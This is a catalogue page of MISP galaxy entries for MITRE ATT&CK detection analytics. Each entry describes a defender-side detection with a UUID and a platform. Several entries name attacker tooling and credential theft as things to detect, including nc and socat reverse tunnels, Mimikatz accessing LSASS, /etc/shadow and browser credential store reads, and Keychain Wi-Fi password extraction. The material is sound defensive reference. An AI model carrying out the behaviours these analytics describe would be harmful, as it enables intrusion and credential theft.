UUID 710aa303-3e9f-4170-95a4-b2caf5f827fd which can be used as unique global reference for Analytic 1591 - AN1591 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1591
mitre_platforms ['Office Suite']

Analytic 1159 - AN1159

Use of configuration backup utilities or CLI access to dump plaintext passwords, local user hashes, or SNMP strings.

Internal MISP references

UUID badcc199-683b-41f5-9522-9710969cff15 which can be used as unique global reference for Analytic 1159 - AN1159 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1159
mitre_platforms ['Network Devices']

Analytic 1166 - AN1166

Automated scripts or repeated CLI/API requests that trigger application backends to consume high CPU or memory (e.g., Apache/PHP, MySQL, mail servers), resulting in syslog errors and excessive process spawning.

Internal MISP references

UUID 35c7be24-c1c0-4ddc-9356-dec5e39414be which can be used as unique global reference for Analytic 1166 - AN1166 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1166
mitre_platforms ['Linux']

Analytic 1616 - AN1616

Enumeration of user or role objects via IdP API endpoints or LDAP queries.

Internal MISP references

UUID cb177f89-c8a4-4233-a2e4-3fdd02dccba1 which can be used as unique global reference for Analytic 1616 - AN1616 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1616
mitre_platforms ['Identity Provider']

Analytic 1661 - AN1661

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID 8f5e4bee-0677-41dd-89ad-8a467ae08eec which can be used as unique global reference for Analytic 1661 - AN1661 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1661
mitre_platforms ['Android']

Analytic 1176 - AN1176

Monitor pmset command executions altering sleep/hibernate/standby parameters. Unexpected modifications to /Library/Preferences/SystemConfiguration/com.apple.PowerManagement.plist or similar files should be correlated with process activity.

Internal MISP references

UUID 101d4e7f-4282-4fea-89be-e17d97ca0b91 which can be used as unique global reference for Analytic 1176 - AN1176 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1176
mitre_platforms ['macOS']

Analytic 1167 - AN1167

Repetitive triggering of GUI or backend application workflows that cause increased CPU/memory usage, logged in unified logs as spin reports or crash dumps.

Internal MISP references

UUID ade844ef-f156-4db2-bc11-9dbdc006c8d6 which can be used as unique global reference for Analytic 1167 - AN1167 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1167
mitre_platforms ['macOS']

Analytic 1617 - AN1617

Account enumeration via esxcli, vim-cmd, or API calls to vSphere.

Internal MISP references

UUID c4973f27-c8db-4478-aaf8-eb73580fceec which can be used as unique global reference for Analytic 1617 - AN1617 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1617
mitre_platforms ['ESXi']

Analytic 1671 - AN1671

Exfiltration Over C2 Channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 6a60d1be-ab95-46d2-91a7-01703553090e which can be used as unique global reference for Analytic 1671 - AN1671 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1671
mitre_platforms ['Android']

Analytic 1761 - AN1761

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 79897090-662d-4118-b73a-145f79e31829 which can be used as unique global reference for Analytic 1761 - AN1761 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1761
mitre_platforms ['iOS']

Analytic 1716 - AN1716

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID f3068304-de28-4efa-96a5-a360fc7ffc97 which can be used as unique global reference for Analytic 1716 - AN1716 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1716
mitre_platforms ['Android']

Analytic 1186 - AN1186

Registry key modifications under IFEO paths (e.g., Debugger value set under Image File Execution Options), especially for security-related or accessibility binaries, followed by anomalous process execution with debugger flags or SYSTEM-level access at login. Detectable by correlating registry modifications, process creation, and parent-child anomalies with unusual command-line usage or access tokens.

Internal MISP references

UUID 3e5b15b0-e6b2-402a-9c4f-e483c968a38e which can be used as unique global reference for Analytic 1186 - AN1186 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1186
mitre_platforms ['Windows']

Analytic 1168 - AN1168

Automated abuse of cloud-hosted applications (e.g., web apps, REST endpoints, internal APIs) causing compute exhaustion, high 5xx error rates, or frequent autoscaling triggers logged in app insights or cloudwatch.

Internal MISP references

UUID 867239cd-7939-446c-9efb-b2a7a5bd5403 which can be used as unique global reference for Analytic 1168 - AN1168 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1168
mitre_platforms ['IaaS']

Analytic 1618 - AN1618

Account enumeration via bulk access to user directory features or hidden APIs.

Internal MISP references

UUID d85db7b4-5eb1-4781-b92c-a18102a568dc which can be used as unique global reference for Analytic 1618 - AN1618 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1618
mitre_platforms ['SaaS']

Analytic 1816 - AN1816

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block bidirectional command and control traffic.

Internal MISP references

UUID 1f1d8e33-293a-4ceb-a91c-0cf71c6805ea which can be used as unique global reference for Analytic 1816 - AN1816 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1816
mitre_platforms ['Android']

Analytic 1681 - AN1681

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f12b94b0-ec2f-4eb1-9ea4-8632e41475a1 which can be used as unique global reference for Analytic 1681 - AN1681 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1681
mitre_platforms ['Android']

Analytic 1619 - AN1619

Account discovery via VBA macros, COM objects, or embedded scripting.

Internal MISP references

UUID 06e0501e-a87e-452d-9ab5-93ed9a5eade5 which can be used as unique global reference for Analytic 1619 - AN1619 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1619
mitre_platforms ['Office Suite']

Analytic 1169 - AN1169

Detects FTP, SMB, or TFTP traffic initiated by suspicious processes like PowerShell, cmd.exe, or rundll32.exe—especially with large outbound file transfers or unbalanced traffic volume.

Internal MISP references

UUID befbbdad-a17b-41f2-bb24-5cb477c5cc50 which can be used as unique global reference for Analytic 1169 - AN1169 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1169
mitre_platforms ['Windows']

Analytic 1961 - AN1961

Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID c755e8b9-7e07-4e9a-95a1-bc7cb88e878a which can be used as unique global reference for Analytic 1961 - AN1961 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1961
mitre_platforms ['PRE']

Analytic 1196 - AN1196

Abuse of bind mounts to obscure process directories. Defender perspective: detecting anomalous mount operations where a process’s /proc entry is remapped to another directory, often hiding malicious activity from native utilities (ps, top). Behavior chain includes: (1) execution of mount with -o bind or -B flags, (2) modification of /proc entries inconsistent with expected process lineage, and (3) subsequent anomalous activity from processes whose metadata no longer matches execution context.

Internal MISP references

UUID d5c81e57-37c4-4393-a202-0955af560983 which can be used as unique global reference for Analytic 1196 - AN1196 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1196
mitre_platforms ['Linux']

Analytic 1691 - AN1691

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID 66adf2b9-42aa-401f-8bc3-3830854017ee which can be used as unique global reference for Analytic 1691 - AN1691 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1691
mitre_platforms ['Android']

Analytic 1177 - AN1177

Multi-stage Windows DACL manipulation behavioral chain: (1) Process creation of permission-modifying utilities (icacls.exe, takeown.exe, attrib.exe, cacls.exe) or PowerShell ACL cmdlets, (2) Command-line analysis revealing privilege escalation intent through suspicious parameters (/grant, /takeown, /T, Set-Acl), (3) DACL modification events (4670) correlating with process execution, (4) Subsequent file access attempts (4663) indicating successful permission bypass, (5) Potential follow-on persistence or lateral movement activities

Internal MISP references

UUID 7e4ac594-c46c-4c7e-ba6d-9a457ab1e767 which can be used as unique global reference for Analytic 1177 - AN1177 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1177
mitre_platforms ['Windows']

Analytic 1717 - AN1717

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 369938c8-6b9e-4eb3-8105-eb76a373dc35 which can be used as unique global reference for Analytic 1717 - AN1717 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1717
mitre_platforms ['iOS']

Analytic 1771 - AN1771

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block command and control traffic.

Internal MISP references

UUID a0bb0e33-c40f-46f5-b64a-07faa6946d83 which can be used as unique global reference for Analytic 1771 - AN1771 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1771
mitre_platforms ['iOS']

Analytic 1187 - AN1187

Detection focuses on correlating snapshot creation events with subsequent instance creation and mounting activities. From a defender perspective, suspicious sequences include snapshot creation by unexpected or newly created IAM users, snapshots created from sensitive volumes without preceding change-control activity, or snapshots immediately followed by mounting to unauthorized instances. Cross-referencing with user behavior, IP geolocation, and automation context helps distinguish benign backup operations from adversary-driven snapshot exploitation.

Internal MISP references

UUID 05af7b9b-ec1a-4d6c-a944-64a7ad0eb2f5 which can be used as unique global reference for Analytic 1187 - AN1187 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1187
mitre_platforms ['IaaS']

Analytic 1178 - AN1178

Correlate DNS queries that generate domains with high entropy or gibberish patterns, combined with short-lived connections from unusual processes. Monitor Sysmon DNS events and Windows Security logs for abnormal query rates and failed lookups.

Internal MISP references

UUID ee7499f8-4262-47cf-8fff-5344f60bf2cf which can be used as unique global reference for Analytic 1178 - AN1178 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1178
mitre_platforms ['Windows']

Analytic 1718 - AN1718

Application vetting services can detect when an application requests administrator permission. When an application requests administrator permission, the user is presented with a popup and the option to grant or deny the request.

Internal MISP references

UUID 31542445-39c5-4ae9-806f-09649581056a which can be used as unique global reference for Analytic 1718 - AN1718 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1718
mitre_platforms ['Android']

Analytic 1817 - AN1817

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block bidirectional command and control traffic.

Internal MISP references

UUID c08bd552-98fd-446d-b848-3c43b3b766f1 which can be used as unique global reference for Analytic 1817 - AN1817 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1817
mitre_platforms ['iOS']

Analytic 1781 - AN1781

Application vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.

Internal MISP references

UUID c37bba44-9ca2-4444-8ee9-7cab0b2fd5fd which can be used as unique global reference for Analytic 1781 - AN1781 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1781
mitre_platforms ['Android']

Analytic 1179 - AN1179

Identify processes issuing repeated DNS queries to random-looking domains with abnormal entropy or word concatenations. Correlate resolver logs with high NXDOMAIN rates and auditd socket connections.

Internal MISP references

UUID 0faa41a3-0d4c-42d1-885a-12436fbee9c1 which can be used as unique global reference for Analytic 1179 - AN1179 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1179
mitre_platforms ['Linux']

Analytic 1971 - AN1971

If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.

Internal MISP references

UUID 1fec971d-c822-4819-9489-8c27857e3481 which can be used as unique global reference for Analytic 1971 - AN1971 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1971
mitre_platforms ['PRE']

Analytic 1197 - AN1197

Detects the modification or addition of Launch Agents or Startup Items to establish persistence. Adversaries may write plist or executable files to ~/Library/LaunchAgents/, /Library/StartupItems/, or similar directories and configure them to run at user or system boot. Detection requires correlating file creation or modification events with subsequent user logon or boot-time process execution.

Internal MISP references

UUID c46d9fac-eac9-479e-91d3-4f5a1066972d which can be used as unique global reference for Analytic 1197 - AN1197 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1197
mitre_platforms ['macOS']

Analytic 1719 - AN1719

Application vetting services could detect usage of standard clipboard APIs.

Internal MISP references

UUID 4b2e7e2d-e1be-4829-9011-53eb5eca3dc6 which can be used as unique global reference for Analytic 1719 - AN1719 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1719
mitre_platforms ['Android']

Analytic 1791 - AN1791

Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID cd82f432-ee4e-4df0-8500-e381b36479ec which can be used as unique global reference for Analytic 1791 - AN1791 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1791
mitre_platforms ['Android']

Analytic 1188 - AN1188

Creation, deletion, or modification of security groups and firewall rules in cloud control plane logs that expand access to cloud resources beyond expected baselines. Defender view: unexpected ingress/egress rules permitting 0.0.0.0/0 or opening atypical ports, often correlated with privileged role or API key activity.

Internal MISP references

UUID ee7c904b-144f-4dc4-87af-7eee4655899c which can be used as unique global reference for Analytic 1188 - AN1188 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1188
mitre_platforms ['IaaS']

Analytic 1818 - AN1818

Exfiltration Over Unencrypted Non-C2 Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID ece5746f-194b-4564-9f5f-7ebf3b23542e which can be used as unique global reference for Analytic 1818 - AN1818 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1818
mitre_platforms ['Android']

Analytic 1189 - AN1189

Detects unusual outbound connections to web services from uncommon processes using SSL/TLS, particularly those exhibiting high outbound data volume or persistence.

Internal MISP references

UUID 5a10a19a-035e-469e-8ec5-fafb1f0f0fe6 which can be used as unique global reference for Analytic 1189 - AN1189 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1189
mitre_platforms ['Windows']

Analytic 1981 - AN1981

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 65390827-81d9-43d0-9c9d-16d8c6509b90 which can be used as unique global reference for Analytic 1981 - AN1981 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1981
mitre_platforms ['PRE']

Analytic 1198 - AN1198

Monitors suspicious access to password stores such as LSASS, DPAPI, Windows Credential Manager, or browser credential databases. Detects anomalous process-to-process access (e.g., Mimikatz accessing LSASS) and correlation of credential store file reads with execution of non-standard processes.

Internal MISP references

UUID de4fe01d-96d7-4258-a1d6-6958fe50a4ed which can be used as unique global reference for Analytic 1198 - AN1198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1198
mitre_platforms ['Windows']

Analytic 1819 - AN1819

Exfiltration Over Unencrypted Non-C2 Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 111bf5b3-ce1c-4f60-b1b0-deef85fc6a0a which can be used as unique global reference for Analytic 1819 - AN1819 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1819
mitre_platforms ['iOS']

Analytic 1991 - AN1991

Once adversaries leverage compromised network devices as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID 4384e648-0f49-442d-b989-6a47f2194130 which can be used as unique global reference for Analytic 1991 - AN1991 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1991
mitre_platforms ['PRE']

Analytic 1199 - AN1199

Detects access to known password store files (e.g., /etc/shadow, GNOME Keyring, KWallet, browser credential databases). Monitors anomalous process read attempts and suspicious API calls that attempt to extract stored credentials.

Internal MISP references

UUID 571b10ce-fb7d-492e-b05a-23649ae14148 which can be used as unique global reference for Analytic 1199 - AN1199 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1199
mitre_platforms ['Linux']

Analytic 1222 - AN1222

Detection of anomalous registry modifications to Subject Interface Packages (SIPs) or trust provider DLL mappings, unexpected loading of non-Microsoft cryptographic modules, or attempts to redirect WinVerifyTrust validation logic. Defender view focuses on registry tampering, suspicious DLL loads into trusted processes, and abnormal trust validation failures correlated across event streams.

Internal MISP references

UUID 5b6f6588-3434-4199-b16f-af44ae546c3d which can be used as unique global reference for Analytic 1222 - AN1222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1222
mitre_platforms ['Windows']

Analytic 1322 - AN1322

Detects unauthorized changes to locally hosted login pages on macOS (common in developer VPN environments) and links file edits to cron jobs, background scripts, or SUID binaries.

Internal MISP references

UUID 564071d9-44b1-44b8-92c0-348e22e544b7 which can be used as unique global reference for Analytic 1322 - AN1322 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1322
mitre_platforms ['macOS']

Analytic 1223 - AN1223

Detects anomalous process execution patterns where a process's parent terminates quickly after process creation or is re-parented to 'init' (PID 1), often indicating double-fork or daemon-style detachment. These behaviors sever the parent-child relationship and obscure the execution origin in process tree analysis.

Internal MISP references

UUID d4a29d94-bce4-4069-a0b5-9e0e731cff97 which can be used as unique global reference for Analytic 1223 - AN1223 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1223
mitre_platforms ['Linux']

Analytic 1232 - AN1232

Direct use of nc, socat, or reverse tunnel scripts initiated by abnormal user contexts or unauthorized VIBs initiating connections from hypervisor to external systems.

Internal MISP references

UUID d8cc8663-020b-4fde-a8de-a92ecf97aea4 which can be used as unique global reference for Analytic 1232 - AN1232 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1232
mitre_platforms ['ESXi']

Analytic 1224 - AN1224

Detects execution patterns where a child process is detached from its original parent, often showing up under 'launchd' (PID 1) with no parent lineage. These breakages in the process tree are indicative of evasive techniques using daemon(), fork() or background execution flags.

Internal MISP references

UUID 269ab5e4-4c45-4f7a-8d82-c235492ff83a which can be used as unique global reference for Analytic 1224 - AN1224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1224
mitre_platforms ['macOS']

Analytic 1422 - AN1422

Detects container breakout behavior via exploitation (e.g., DirtyPipe, CVE-2022-0847), followed by host OS interaction or escalated capability assignment.

Internal MISP references

UUID 2a93100f-6332-4c91-bad9-fd371d638309 which can be used as unique global reference for Analytic 1422 - AN1422 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1422
mitre_platforms ['Containers']

Analytic 1242 - AN1242

Detection focuses on abnormal or unauthorized cloud instance creation events. From a defender’s perspective, suspicious behavior includes VM/instance creation by rarely used or newly created accounts, creation events from unusual geolocations, or rapid sequences of snapshot creation followed by instance creation and mounting. Unexpected network or IAM policy changes applied to new instances can indicate adversarial use rather than legitimate provisioning.

Internal MISP references

UUID b8ec766b-cfb9-4ef8-bd46-655f0b820ad3 which can be used as unique global reference for Analytic 1242 - AN1242 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1242
mitre_platforms ['IaaS']

Analytic 1522 - AN1522

Repeated failed SSH login attempts followed by a possible success from the same remote host

Internal MISP references

UUID 14390641-6cba-4351-a488-bf97c6eee8a7 which can be used as unique global reference for Analytic 1522 - AN1522 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1522
mitre_platforms ['Linux']

Analytic 1252 - AN1252

Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations.

Internal MISP references

UUID 78864416-9ea3-4285-aab4-ecf31c935253 which can be used as unique global reference for Analytic 1252 - AN1252 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1252
mitre_platforms ['Windows']

Analytic 1225 - AN1225

Detects suspicious usage of common application-layer protocols (e.g., HTTP, HTTPS, DNS, SMB) by abnormal processes, with high outbound byte counts or irregular ports, possibly indicating command and control or data exfiltration.

Internal MISP references

UUID 908aa2d1-f1c0-456b-9c9f-b984b309e51c which can be used as unique global reference for Analytic 1225 - AN1225 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1225
mitre_platforms ['Windows']

Analytic 1622 - AN1622

Adversary modifies externally-facing web content by accessing and overwriting hosted HTML/JS/CSS files, typically following web shell deployment, credential abuse, or exploitation of web application vulnerabilities.

Internal MISP references

UUID 67febd8b-36fe-4f72-8647-95fe449ecb5d which can be used as unique global reference for Analytic 1622 - AN1622 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1622
mitre_platforms ['Windows']

Analytic 1226 - AN1226

Detects suspicious curl, wget, or custom socket traffic that leverages DNS, HTTPS, or IRC-style protocols with unbalanced traffic or beacon-like intervals.

Internal MISP references

UUID 989a524f-cf9a-4fcc-a21f-ac5aac46f0ed which can be used as unique global reference for Analytic 1226 - AN1226 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1226
mitre_platforms ['Linux']

Analytic 1262 - AN1262

Multiple failed authentication attempts using distinct username/password pairs from a single IP address or session within a short time window, targeting common services like RDP or SMB

Internal MISP references

UUID e3e2d59b-220f-43b0-9891-7b299be27c50 which can be used as unique global reference for Analytic 1262 - AN1262 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1262
mitre_platforms ['Windows']

Analytic 1272 - AN1272

Unusual mounting of loopback or pseudo file systems not aligned with legitimate administrative activity. Defender view: monitoring auditd and syslog for mount commands involving suspicious mount points, reserved blocks, or device mappings indicative of hidden partitions.

Internal MISP references

UUID 35300a0c-e135-4865-9fe5-9d65a1c77dda which can be used as unique global reference for Analytic 1272 - AN1272 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1272
mitre_platforms ['Linux']

Analytic 1227 - AN1227

Detects applications using abnormal protocols or high volume traffic not previously associated with the process image, such as Automator or AppleScript invoking curl or python sockets.

Internal MISP references

UUID c2b959ca-75f4-4291-9812-0b065e7bb395 which can be used as unique global reference for Analytic 1227 - AN1227 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1227
mitre_platforms ['macOS']

Analytic 1722 - AN1722

Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

Internal MISP references

UUID d4dc642d-922b-4476-ad3f-ba23c43702f5 which can be used as unique global reference for Analytic 1722 - AN1722 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1722
mitre_platforms ['Android']

Analytic 1228 - AN1228

Detects application-layer tunneling or unauthorized app protocols like DNS-over-HTTPS, embedded C2 in TLS/HTTP headers, or misused SMB traffic crossing VLANs.

Internal MISP references

UUID c5117811-b262-4920-90d9-001d25b6305b which can be used as unique global reference for Analytic 1228 - AN1228 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1228
mitre_platforms ['Network Devices']

Analytic 1282 - AN1282

Use of the security command or Keychain API to extract known Wi-Fi passwords for target SSIDs.

Internal MISP references

UUID ce2233bb-9715-4e7b-8603-7218f8bae326 which can be used as unique global reference for Analytic 1282 - AN1282 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1282
mitre_platforms ['macOS']

Analytic 1822 - AN1822

The user can review available call logs for irregularities, such as missing or unrecognized calls. The user can view their default phone app in device settings.

Internal MISP references

UUID d2cf1cf2-7b11-4018-b5bc-fbd48633f869 which can be used as unique global reference for Analytic 1822 - AN1822 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1822
mitre_platforms ['Android']

Analytic 1229 - AN1229

Suspicious process spawning (e.g., rundll32, svchost, powershell, or netsh) followed by network connection creation to internal hosts or uncommon external endpoints on high or non-standard ports.

Internal MISP references

UUID 0e9add05-93bd-47b2-acf5-1817f03e804a which can be used as unique global reference for Analytic 1229 - AN1229 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1229
mitre_platforms ['Windows']

Analytic 1292 - AN1292

Detects DHCP spoofing by monitoring unified logs for unexpected DHCP ACK/OFFER parameters and correlating with packet captures for multiple DHCP servers. Behavioral emphasis is on inconsistent DNS and gateway assignments that redirect traffic.

Internal MISP references

UUID 4f2bc468-a57d-44e9-b9cd-d491df6b0daf which can be used as unique global reference for Analytic 1292 - AN1292 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1292
mitre_platforms ['macOS']

Analytic 1332 - AN1332

Monitor resolver logs and auditd events for domains resolving to a rotating set of IPs within very short TTL intervals. Correlate high query rates from non-browser applications (e.g., python, curl).

Internal MISP references

UUID 8a226737-e2a7-4b70-8964-98c47444a638 which can be used as unique global reference for Analytic 1332 - AN1332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1332
mitre_platforms ['Linux']

Analytic 1233 - AN1233

Dynamic or static port forwarding rules added to route traffic through an internal host, or configuration changes to proxy firewall rules not aligned with baselined policy.

Internal MISP references

UUID a79ae1d1-1a8d-427d-aa6d-261ea63d5650 which can be used as unique global reference for Analytic 1233 - AN1233 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1233
mitre_platforms ['Network Devices']

Analytic 1323 - AN1323

Correlate suspicious registry modifications to known COM object CLSIDs with subsequent DLL loads or unexpected binary execution paths. Detect placement of COM CLSID entries under HKEY_CURRENT_USER\Software\Classes\CLSID\ overriding default HKLM paths. Flag anomalous DLL loads traced back to hijacked COM registry changes.

Internal MISP references

UUID cda93955-7500-49dd-9150-94bedae91d22 which can be used as unique global reference for Analytic 1323 - AN1323 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1323
mitre_platforms ['Windows']

Analytic 1423 - AN1423

Access and retrieval of container service account tokens followed by unauthorized API requests using those tokens to interact with the Kubernetes API server or internal services.

Internal MISP references

UUID 78821450-c84f-498f-abf2-b43211fa4218 which can be used as unique global reference for Analytic 1423 - AN1423 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1423
mitre_platforms ['Containers']

Analytic 1432 - AN1432

Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs.

Internal MISP references

UUID 9e03886b-155c-4483-9d92-dad6a7d8543b which can be used as unique global reference for Analytic 1432 - AN1432 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1432
mitre_platforms ['Network Devices']

Analytic 1324 - AN1324

Detection of token duplication and impersonation attempts by correlating suspicious command-line executions (e.g., runas) with API calls to DuplicateToken, DuplicateTokenEx, ImpersonateLoggedOnUser, or SetThreadToken. The chain includes the initial command execution or in-memory API invocation → token handle duplication or thread token assignment → a new or existing process assuming the impersonated user's context.

Internal MISP references

UUID b76aeebb-3915-48ed-ac35-6af54c88c3bb which can be used as unique global reference for Analytic 1324 - AN1324 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1324
mitre_platforms ['Windows']

Analytic 1243 - AN1243

Monitor kernel module load/unload activity via modprobe, insmod, rmmod, or direct manipulation of /lib/modules. Correlate with installation of kernel headers, compilation commands, or downloads of .ko files. Detect anomalies in unsigned module loading or repeated module load attempts under non-root users.

Internal MISP references

UUID c221d379-1dcb-4ca7-908e-59f6ed7afaed which can be used as unique global reference for Analytic 1243 - AN1243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1243
mitre_platforms ['Linux']

Analytic 1342 - AN1342

Failed authentication attempts across user mailboxes using identical or common passwords (e.g., OWA brute attempts)

Internal MISP references

UUID cfffc717-79f1-4aea-9e68-475ef52db11d which can be used as unique global reference for Analytic 1342 - AN1342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
